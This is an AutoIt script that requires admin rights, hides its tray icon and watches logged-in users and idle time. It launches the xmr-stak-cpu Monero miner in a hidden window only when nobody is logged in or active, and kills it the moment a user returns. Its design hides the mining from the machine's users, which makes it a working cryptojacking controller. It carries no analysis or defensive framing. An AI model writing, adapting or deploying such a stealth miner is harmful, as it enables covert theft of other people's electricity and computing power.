#RequireAdmin
Opt("TrayIconHide", 1)
#include <ButtonConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#include <Timers.au3>
#include <Date.au3>
#include <Constants.au3>
#include <Process.au3>
#include <Array.au3>

Dim $settings = @ScriptDir & '\mConfig.ini'
Dim $MINEPROCESS = IniRead($settings, 'Settings', 'MINEPROCESS', 'xmr-stak-cpu.exe')
Dim $MINEARGS = IniRead($settings, 'Settings', 'MINEARGS', '')
Dim $waittime = IniRead($settings, 'Settings', 'waittime', 15)
IniWrite($settings, 'Settings', 'MINEPROCESS', $MINEPROCESS)
IniWrite($settings, 'Settings', 'MINEARGS', $MINEARGS)
IniWrite($settings, 'Settings', 'waittime', $waittime)


$LOCALAPPPATH = @ScriptDir & "\"
$running = 0
$PID = 0
$not_idle = 1
While 1 ; Monitor idle time
	$users_logged_in = _QueryUser()
	$idle = _isIdle()

	If $users_logged_in = 0 And $idle = 1 And $running = 0 Then ;if user not logged in, idle, and not running, start program
		ConsoleWrite("Run!" & @CRLF)
		ConsoleWrite("Start Command: " & $MINEPROCESS & ' ' & $MINEARGS & @CRLF)
		$running = 1
		$PID = Run(@ComSpec & ' /c "' & $MINEPROCESS & '" ' & $MINEARGS, $LOCALAPPPATH, @SW_HIDE)
		ProcessSetPriority ($PID, 0)
		ProcessSetPriority ($MINEPROCESS, 0)
	ElseIf ($users_logged_in = 1 Or $idle = 0) And $running = 1 Then ;if user logged in or not idle, and running, kill program
		ConsoleWrite("Kill!" & @CRLF)
		$running = 0
		ProcessClose($MINEPROCESS)
	Else
		If ProcessExists($MINEPROCESS) Then
			$running = 1
		Else
			$running = 0
		EndIf
	EndIf
	ConsoleWrite("Users:" & $users_logged_in & " Idle:" & $idle & " $running:" & $running & @CRLF)
	Sleep($waittime * 1000)
WEnd

Func _QueryUser()
	Local $line, $lines, $return
	Local $InUse = -1
	$tempfile = $LOCALAPPPATH & "querytemp.txt"
	$queryexe = $LOCALAPPPATH & "quser.exe"

	ConsoleWrite(@ComSpec & ' /c ' & '"' & $queryexe & '" > ' & '"' & $tempfile & '"' & @CRLF)
	_RunDos(@ComSpec & ' /c ' & '"' & $queryexe & '" > ' & '"' & $tempfile & '"')
	;Open query temp file and go through it
	$querytempfile = FileOpen($tempfile, 0)
	If $querytempfile <> -1 Then
		$queryfile = FileRead($querytempfile)
		$TempFileArray = StringSplit($queryfile, @CRLF)
		If IsArray($TempFileArray) Then
			For $loop = 2 To $TempFileArray[0]
				$line = $TempFileArray[$loop]
				$line = StringStripWS($line, 7)
				;ConsoleWrite($line & @CRLF)
				$splitline = StringSplit($line, " ")
				If $splitline[0] = 8 Then
					$InUse = 1
					$UserName = $splitline[1]
					$Session = $splitline[2]
					$Id = $splitline[3]
					$State = $splitline[4]
					$IdleTime = $splitline[5]
					$LoginTime = $splitline[6] & ' ' & $splitline[7] & ' ' & $splitline[8]
					ConsoleWrite(_Now() & " | User '" & $UserName & "' connected" & @CRLF)
				EndIf
			Next
			If $InUse = -1 Then
				$InUse = 0
				ConsoleWrite(_Now() & " | no users connected" & @CRLF)
			EndIf
		EndIf
		FileClose($querytempfile)
		FileDelete($tempfile)
	EndIf
	Return ($InUse)
EndFunc   ;==>_QueryUser

Func _isIdle()
    ; If idle for more than 10 secs
    If _Timer_GetIdleTime() > ($waittime * 1000) Then
		Return 1
	Else
		Return 0
	EndIf
EndFunc
